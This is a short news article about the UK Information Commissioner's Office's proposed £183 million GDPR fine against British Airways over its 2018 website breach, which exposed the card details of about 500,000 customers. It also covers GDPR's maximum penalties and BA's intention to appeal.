UK Information Commissioners Office (ICO), which is the GDPR supervisory authority, issued the biggest GDPR penalty to British Airways amounting to £183.39 million or $228 million for failure to employ security controls that led to a cyberattack on its website in 2018. British Airways can still file an appeal.
Prior to this penalty, the biggest was the £500,000 or $623,000 paid by Facebook in connection with the Cambridge Analytica scandal. The British Airways breach took place after the effective date of EU’s GDPR on May 25, 2018.
GDPR changed a prior EU directive and aside from presenting a number of new privacy and security regulations, higher fines for privacy and data security failures were applied. For a major GDPR violation, the highest penalty is €20 million ($22.4 million) or 4% of global annual income, whatsoever is higher.
The £183 million penalty that ICO issued is equal to 1.5% of British Airway’s 2017 global annual income. The maximum penalty issued could be roughly £500 million assuming BA is a holding company just like International Airlines Group (IAG). IAG’s 2017 global annual income was €2.27 billion.
Under the GDPR, entities that suffered a breach and had certain EU citizens’ data affected need to report the breach to ICO within 72 hours of knowing about it. British Airways made an announcement about its breach and sent in a breach report on September 6, 2018, just 24 hours after finding out about the breach.
ICO looked into the breach and found security issues that permitted hackers to access BA’s website without authorization. The hackers put a code so that site visitors get redirected to a fake webpage, where their personal information and credit/debit card details were stolen. ICO stated that the personal and financial information of around 500,000 clients were stolen. The breach took place some time in June 2018 up to September 5.
ICO didn’t issue the fine because of the breach itself. The fine demonstrates how big an issue security failures are, potentially allowing hackers to have unauthorized access.
ICO only issued a ‘Notice of Intent’ to penalize British Airways. BA can file an appeal within 28 days. The International Airlines Group’s chief executive, Willie Walsh, announced their plan to do whatever it takes to secure the airline’s position, including the filing of an appeal.